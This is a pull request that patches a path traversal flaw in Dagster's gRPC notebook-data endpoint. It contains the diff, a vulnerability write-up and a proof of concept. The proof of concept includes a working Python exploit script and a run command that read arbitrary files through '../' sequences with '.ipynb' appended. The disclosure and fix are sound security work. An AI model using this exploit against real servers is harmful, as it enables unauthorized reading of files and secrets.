### PR TITLE
Fixed local file inclusion vulnerability in gRPC server's `ExternalNotebookData` endpoint

### DIFF
--- a/python_modules/dagster/dagster/_grpc/impl.py
+++ b/python_modules/dagster/dagster/_grpc/impl.py
@@ -579,10 +579,12 @@ def get_notebook_data(notebook_path):
 
     requested_path = os.path.abspath(notebook_path)
     working_dir = os.path.abspath(os.getcwd())
-    
+
     common_prefix = os.path.commonpath([requested_path, working_dir])
     if common_prefix != working_dir:
-        raise Exception("Access denied. Notebook path must be within the current working directory.")
+        raise Exception(
+            "Access denied. Notebook path must be within the current working directory."
+        )
 
     with open(requested_path, "rb") as f:
         content = f.read()

--- a/python_modules/dagster/dagster/_grpc/impl.py
+++ b/python_modules/dagster/dagster/_grpc/impl.py
@@ -577,6 +577,13 @@ def get_notebook_data(notebook_path):
             " '.ipynb'."
         )
 
-    with open(os.path.abspath(notebook_path), "rb") as f:
+    requested_path = os.path.abspath(notebook_path)
+    working_dir = os.path.abspath(os.getcwd())
+    
+    common_prefix = os.path.commonpath([requested_path, working_dir])
+    if common_prefix != working_dir:
+        raise Exception("Access denied. Notebook path must be within the current working directory.")
+
+    with open(requested_path, "rb") as f:
         content = f.read()
         return content


### PR DESCRIPTION
**Version**: 1.10.14

### Description

The gRPC server implementation contains a Local File Inclusion (LFI) vulnerability. It exists in the `ExternalNotebookData` endpoint, which is designed to load notebook data for integration with Dagster workflows.

The issue occurs because the `get_notebook_data` function performs insufficient path validation, only checking if the file path ends with `.ipynb`. An attacker with access to the gRPC server can craft requests that include traversal sequences (`../`) to read arbitrary files by appending `.ipynb` to any path. The use of `os.path.abspath()` in the implementation does not prevent directory traversal attacks.

By default, the gRPC server binds to localhost, limiting remote exploitation. However, in custom deployments where the server is bound to external interfaces or in cloud-based deployments, the vulnerability could allow unauthorized file access.

### Source-Sink Analysis

1. **Source**: The user-controlled input originates from the `notebook_path` field in gRPC requests to the `ExternalNotebookData` endpoint in `server.py`.

2. **Processing**: The `get_notebook_data` function in `impl.py` performs only a simple extension check.

3. **Sink**: The vulnerability occurs at the `open(os.path.abspath(notebook_path), "rb")` call, which opens files based on user-controlled input with insufficient sanitization.

### Proof of Concept

1. Create a target file to read:
```bash
echo "SECRET_DATA_12345" > /tmp/secret.ipynb
```

2. Start the Dagster gRPC server:
```bash
dagster api grpc --python-file repository.py --host 0.0.0.0 --port 4266
```

3. Use the following exploit script:
```python
import grpc
import sys

from dagster._grpc.__generated__ import dagster_api_pb2
from dagster._grpc.__generated__ import dagster_api_pb2_grpc

def exploit_lfi(host, port, target_file):
    # create a gRPC channel to the server
    channel = grpc.insecure_channel(f"{host}:{port}")
    
    # create a stub
    stub = dagster_api_pb2_grpc.DagsterApiStub(channel)
    
    if not target_file.endswith(".ipynb"):
        target_file = target_file + ".ipynb"
    
    # create the request
    request = dagster_api_pb2.ExternalNotebookDataRequest(notebook_path=target_file)
    
    try:
        # send the request
        response = stub.ExternalNotebookData(request)
        
        # print the response
        print(response.content.decode('utf-8', errors='replace'))
        return True
    except grpc.RpcError as e:
        print(f"RPC Error: {e.details()}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(1)
    
    HOST = "localhost"
    PORT = 4266
    
    target_file = sys.argv[1]
    
    exploit_lfi(HOST, PORT, target_file)
```

4. Run the exploit to read a file using path traversal:
```bash
python exploit.py "../../../../tmp/secret"
```
